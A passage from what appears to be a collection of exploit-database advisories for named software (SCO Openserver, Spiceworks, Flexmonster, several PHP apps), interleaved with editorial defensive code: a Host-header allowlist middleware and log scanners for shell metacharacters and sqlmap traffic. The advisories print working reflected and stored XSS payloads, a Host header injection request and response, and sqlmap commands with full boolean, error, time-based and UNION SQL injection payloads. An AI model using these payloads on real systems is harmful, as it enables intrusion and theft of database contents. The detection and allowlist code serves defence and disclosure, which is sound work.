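    """Split one constructed log line into a request record."""
    method, path, ms, body = line.split(" ", 3)
    params = urllib.parse.parse_qs(body, keep_blank_values=True)
    return {"method": method, "path": path, "ms": int(ms), "params": params}


def suspicious_params(params):
    """Names of watched parameters whose decoded value contains shell metacharacters."""
    hits = []
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if META_RE.search(value):
                hits.append(name)
                break
    return hits


def analyse(log_text, baseline_ms=None, slow_factor=5):
    """Return one finding per flagged request: (path, hit_params, ms, slow)."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    if baseline_ms is None:
        # Median response time of requests that carry no metacharacters.
        clean = sorted(e["ms"] for e in events if not suspicious_params(e["params"]))
        baseline_ms = clean[len(clean) // 2] if clean else 0
    findings = []
    for e in events:
        hits = suspicious_params(e["params"])
        if hits:
            slow = baseline_ms > 0 and e["ms"] >= slow_factor * baseline_ms
            findings.append((e["path"], hits, e["ms"], slow))
    return findings


if __name__ == "__main__":
    for path, hits, ms, slow in analyse(SAMPLE_LOG):
        print(f"{path}: metacharacters in {hits}, {ms} ms, slow={slow}")
```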
-
SCO Openserver 5.0.7 - 'section' Reflected XSS
# Exploit Title: SCO Openserver 5.0.7 - 'section' Reflected XSS
# Google Dork: inurl:/cgi-bin/manlist?section
# Discovered Date: 14/06/2020
# Author: Ramikan
# Vendor Homepage: https://www.xinuos.com/products
# Software Link: https://www.sco.com/products/openserver507/-overview
# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
# Tested on: SCO Openserver 5.0.7 & version 6
# CVE : CVE-2020-25495

*************************************************************************************************************************************
Vulnerability: Reflected XSS & HTML Injection
*************************************************************************************************************************************

A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tags via the parameter 'section'.

Affected URL: http://host:8457/cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script>
Affected Parameter: section

*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
GET /cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> HTTP/1.1
Host: 192.168.20.48:8457
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

*************************************************************************************************************************************
Response:
*************************************************************************************************************************************
HTTP/1.1 200 OK
Date: Thu, 03 Sep 2020 17:08:51 GMT
Server: Apache/1.3.36 (Unix) mod_perl/1.29
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<title>Manual section "><h1>hello</h1></P><script>alert(123)</script></title>
<META HTTP-EQUIV='Content-Type' CONTENT='text/html;charset=ISO-8859-1'>
<link rel="stylesheet" type="text/css" href="/styles/lin_moz.css" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body bgcolor="#FFFFFF" topmargin="0" marginheight="0">
<!-- Begin DocView navigation toolbar -->
<!--htdig_noindex-->
<table class=dvtb width="100%" cellpadding=0 cellspacing=0 border=0 style="padding: 0;" >
<tr valign=top class=dvtb>
<td class=dvdb>
<table class=dvtb cellpadding=3 cellspacing=1 border=0 bgcolor=#FFFFFF width=611 >
<tr class=dvtb>
<td class=dvtb align=center style="background: #2059A6;"> <a href="/en/index.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> DOC HOME </a></td>
<td class=dvtb align=center style="background: #2059A6;"> <a href="/en/Navpages/sitemap.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> SITE MAP </a></td>
<td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/manform?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> MAN PAGES </a></td>
<td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/infocat?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> GNU INFO </a></td>
<td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/search?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> SEARCH </a></td>
</tr>
</table>
</td>
<td class=dvtb align="left" width=100%>
<table class=dvtb cellpadding="3" cellspacing="1" border="0" width="100%" bgcolor="#FFFFFF" >
<tr class=dvtb valign="top">
<td class=dvtb style="background: #2059A6;" align=center width=100%> <a name=null class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;" > </a> </td>
</tr>
</table>
</td>
</tr>
</table>
<!--/htdig_noindex-->
<!-- End DocView navigation toolbar -->
<h1>Manual section<h1>Manual section "><h1>hello</h1></P><script>alert(123)</script></h1><PRE> </PRE>
</body></html>
-
Spiceworks 7.5 - HTTP Header Injection
# Exploit Title: Spiceworks 7.5 - HTTP Header Injection # Google Dork: inurl:/pro_users/login # Discovered Date: 15/09/2020 # Exploit Author: Ramikan # Vendor Homepage: https://www.spiceworks.com # Affected Version: 7.5.7.0 may be others. # Tested On Version: 7.5.7.0 # CVE : CVE-2020-25901 Vulnerability: Host Header Injection Description: Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Spiceworks version 7.5.7.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack. Request: GET / HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""} Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 302 Found 
Date: Tue, 15 Sep 2020 12:46:52 GMT
Cache-Control: no-cache
X-Runtime: 0
Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly
Location: http://google.com/pro_users/login
Content-Length: 99
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://google.com/pro_users/login">redirected</a>.</body></html>

Request 2:

GET /pro_users/login HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""}
Upgrade-Insecure-Requests: 1

Response 2 ("Forgot your password" link replaced with the domain from the Host header):
HTTP/1.1 200 OK
Date: Tue, 15 Sep 2020 12:48:26 GMT
Cache-Control: private, max-age=0, must-revalidate
X-UA-Compatible: IE=edge,chrome=1
X-Runtime: 0
ETag: "77c8f98180ec3f6d4f2fcc8dcd796462"
Set-Cookie: compatibility_test=testing; path=/
Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly
Content-Length: 9875
Connection: close
Content-Type: text/html; charset=utf-8

<div class="control-group controls forgot_password"> <a href="http://google.com/wizard/password/new" class="forgot-password">Forgot your password?</a> </div>
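Added example (editorial; not from the advisory author and not Spiceworks code): a WSGI middleware that rejects requests whose Host header is not on an explicit allowlist, plus a redirect helper that builds the Location URL from a configured canonical host rather than from the incoming request, which is the defensive counterpart of the redirect and link shown above. The host name helpdesk.example.internal and the login_app stand-in are placeholders.

```python
import re
from typing import Callable, Iterable, List, Tuple

# Accepts "host", "host:port", "[v6]" or "[v6]:port"; group 1 is the host without port.
_HOST_RE = re.compile(r"^(\[[0-9a-f:.]+\]|[a-z0-9.-]+)(?::\d{1,5})?\Z", re.IGNORECASE)

def normalize_host(raw: str) -> str:
    """Lower-cased Host value with any port removed; '' if it is not a well-formed host."""
    m = _HOST_RE.match(raw.strip())
    return m.group(1).lower() if m else ""

def host_allowed(raw: str, allowed: Iterable[str]) -> bool:
    """True only when the normalized Host header exactly matches an allowlisted name."""
    host = normalize_host(raw)
    return bool(host) and host in {h.lower() for h in allowed}

class HostAllowlist:
    """WSGI middleware: reject any request whose Host header is not allowlisted (HTTP 400)."""
    def __init__(self, app: Callable, allowed_hosts: Iterable[str]) -> None:
        self.app = app
        self.allowed = [h.lower() for h in allowed_hosts]

    def __call__(self, environ, start_response):
        if not host_allowed(environ.get("HTTP_HOST", ""), self.allowed):
            start_response("400 Bad Request", [("Content-Type", "text/plain")])
            return [b"Bad Request: invalid Host header\n"]
        return self.app(environ, start_response)

CANONICAL_HOST = "helpdesk.example.internal"  # placeholder for the deployment's real name

def redirect_location(path: str, scheme: str = "https") -> str:
    """Absolute redirect target built from configuration, never from the request's Host."""
    if not path.startswith("/") or path.startswith("//"):
        raise ValueError("path must be a local absolute path")
    return f"{scheme}://{CANONICAL_HOST}{path}"

def login_app(environ, start_response):
    """Placeholder stand-in for the '/' -> '/pro_users/login' redirect seen in the advisory."""
    if environ.get("PATH_INFO", "/") == "/":
        start_response("302 Found", [("Location", redirect_location("/pro_users/login"))])
        return [b"You are being redirected.\n"]
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"login form\n"]

def call_app(app: Callable, host: str, path: str = "/") -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Drive a WSGI app with a constructed environ; return (status, headers, body)."""
    captured = {}
    def start_response(status, headers, exc_info=None):
        captured["status"], captured["headers"] = status, headers
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path, "HTTP_HOST": host}
    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body

app = HostAllowlist(login_app, [CANONICAL_HOST])

if __name__ == "__main__":
    # A spoofed Host is refused before the app runs; an allowlisted one gets the
    # redirect with a Location built from CANONICAL_HOST, not from the header.
    for host in ("google.com", CANONICAL_HOST, CANONICAL_HOST + ":443"):
        status, headers, _ = call_app(app, host)
        print(f"Host: {host} -> {status} {dict(headers).get('Location', '')}")
```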
-
Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version: Flexmonster Pivot Table & Charts 2.7.17
# Tested on: Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20142

Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under the "Open" menu in Flexmonster Pivot Table & Charts 2.7.17.

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to a non-existent file (the XSS payload). This results in the execution of the payload.

payload: <svg onload=alert("OpenRemoteCSV")><!--
-
Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version: Flexmonster Pivot Table & Charts 2.7.17
# Tested on: Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20141

Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component under the Connect menu in Flexmonster Pivot Table & Charts 2.7.17.

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to a non-existent file (the XSS payload). This results in the execution of the payload.

payload: <svg onload=alert("OLAPTool")><!--
-
Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version: Flexmonster Pivot Table & Charts 2.7.17
# Tested on: Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20140

Cross Site Scripting (XSS) vulnerability in the Remote Report component under the Open menu in Flexmonster Pivot Table & Charts 2.7.17.

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to a non-existent file (the XSS payload). This results in the execution of the payload.

payload: <svg onload=alert("OpenRemoteReport")><!--
-
Point of Sale System 1.0 - Multiple Stored XSS
# Exploit Title: Point of Sale System 1.0 - Multiple Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-18
# Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html
# Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS

Step 1. Log in to the application with admin credentials.
Step 2. Click on "Suppliers" in the header and select "Add Supplier".
Step 3. Input "<script>alert("r0b0tG4nG")</script>" in all fields of the form.
Note: The Stored XSS vulnerability can also be found on the "Customers" page when you select "Add New Customer". Apply the same method as above to execute the Stored XSS.
Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on the "Suppliers" page, your XSS payloads will be triggered.
Note: Stored XSS can also be triggered when you click on the "Products" page and select "Add New Product".
-
Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version: Flexmonster Pivot Table & Charts 2.7.17
# Tested on: Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20139

Cross Site Scripting (XSS) vulnerability in the Remote JSON component.

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to a non-existent file (the XSS payload). This results in the execution of the payload.

payload: <svg onload=alert("OpenRemoteJSON")><!--
-
Medical Center Portal Management System 1.0 - 'id' SQL Injection
# Exploit Title: Medical Center Portal Management System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-10
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS

Step 1. Log in to the application with any verified user credentials.
Step 2. Select Staff and select the view icon.
Step 3. You will be redirected to a page like "http://localhost/pages/emp_searchfrm.php?action=edit & id=1", or visit any page that has the "id" parameter. Capture the current page request in Burp Suite.
Step 4. Save the request and run sqlmap on the request file using the command "sqlmap -r request -p id --time-sec=5 --dbs".
Step 5. This will inject successfully and you will have an information disclosure of all database contents.
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: action=edit & id=(SELECT (CASE WHEN (7289=7289) THEN 22 ELSE (SELECT 4035 UNION SELECT 6415) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: action=edit & id=22 AND (SELECT 9743 FROM(SELECT COUNT(*),CONCAT(0x716b6a7871,(SELECT (ELT(9743=9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=edit & id=22 AND (SELECT 4861 FROM (SELECT(SLEEP(5)))xiXm)

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=edit & id=22 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x4b445769664f765073644975666f6e50615968654f6b626259447767746c67516949686365597672,0x71706b7071),NULL,NULL,NULL,NULL-- -
---
-
Customer Support System 1.0 - 'id' SQL Injection
# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS

Step 1. Log in to the application with admin credentials.
Step 2. Click on Customer and select list.
Step 3. On the Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in Burp Suite.
Step 4. Save the request and run sqlmap on the request file using the command "sqlmap -r request -p id --time-sec=5 --dbs".
Step 5. This will inject successfully and you will have an information disclosure of all database contents.

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=edit_staff&id=1 AND 4164=4164

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
---
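Added example, not part of this advisory or of the Medical Center Portal one above (editorial code, not the author's): detection logic that scans constructed web-server access-log lines for the four sqlmap techniques both sqlmap outputs list (boolean-based, error-based, time-based, UNION) by URL-decoding each request's query string and matching one signature per technique. The IPs, timestamps and log lines are constructed sample data; the paths and parameter names follow the two advisories.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# One signature per technique named in the sqlmap output above (order = report order).
_SIGNATURES = [
    ("union", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)|\bBENCHMARK\s*\(", re.I)),
    ("error-based", re.compile(
        r"\bFLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|\bINFORMATION_SCHEMA\.", re.I)),
    ("boolean-based", re.compile(
        r"\b(AND|OR)\s+\(?\s*\d+\s*=\s*\d+\b|\bCASE\s+WHEN\b", re.I)),
]

# Combined-log request line: ip ident user [timestamp] "METHOD target proto" status ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_query(target: str) -> str:
    """URL-decoded query string of a request target ('' if it has none)."""
    _, _, query = target.partition("?")
    return unquote_plus(query)

def classify(query: str) -> List[str]:
    """Names of the techniques whose signature appears in an already-decoded query."""
    return [name for name, rx in _SIGNATURES if rx.search(query)]

def scan_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one access-log line; return a hit record, or None when nothing matches."""
    m = _LOG_RE.match(line)
    if not m:
        return None
    techniques = classify(decode_query(m.group("target")))
    if not techniques:
        return None
    return {"ip": m.group("ip"), "status": m.group("status"),
            "target": m.group("target"), "techniques": techniques}

def scan(lines) -> List[Dict[str, object]]:
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample log: two benign requests plus the payload shapes from the sqlmap output.
_TS = "[11/Dec/2020:10:14:02 +0000]"
_UA = '"-" "sqlmap/1.4.12"'
SAMPLE_LOG = [
    f'198.51.100.2 - - {_TS} "GET /index.php?page=edit_customer&id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - {_TS} "GET /index.php?page=edit_customer&id=1%20AND%204164%3D4164 HTTP/1.1" 200 5120 {_UA}',
    f'203.0.113.7 - - {_TS} "GET /index.php?page=edit_customer&id=1%20AND%20(SELECT%209430%20FROM%20(SELECT(SLEEP(5)))HIyV) HTTP/1.1" 200 5120 {_UA}',
    f'203.0.113.7 - - {_TS} "GET /pages/emp_searchfrm.php?action=edit&id=22%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x41,0x71706b7071),NULL,NULL,NULL,NULL--%20- HTTP/1.1" 200 9031 {_UA}',
    f'203.0.113.7 - - {_TS} "GET /pages/emp_searchfrm.php?action=edit&id=22%20AND%20(SELECT%209743%20FROM(SELECT%20COUNT(*),CONCAT(0x716b6a7871,(SELECT%20(ELT(9743%3D9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) HTTP/1.1" 500 1203 {_UA}',
    f'203.0.113.7 - - {_TS} "GET /pages/emp_searchfrm.php?action=edit&id=(SELECT%20(CASE%20WHEN%20(7289%3D7289)%20THEN%2022%20ELSE%20(SELECT%204035%20UNION%20SELECT%206415)%20END)) HTTP/1.1" 200 9031 {_UA}',
    f'198.51.100.2 - - {_TS} "GET /index.php?page=search&q=salt+and+pepper HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    # Benign lines (including the plain-English "and") produce no hit; each sqlmap
    # line is tagged with its technique(s), the CASE WHEN payload with two.
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["techniques"], hit["target"][:60])
```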
-
Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS
# Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS

Step 1. Log in to the application with any valid credentials.
Step 2. Click on the username in the header and select "Manage Account".
Step 3. On the "Manage Account" page, insert "<script>alert("r0b0tG4nG")</script>" in both the "First Name" & "Last Name" fields.
Step 4. Complete the other required details and click on save to update the user information.
Step 5. This should trigger the XSS payloads. Whenever the user logs in with the same valid credentials, the XSS payloads will be triggered.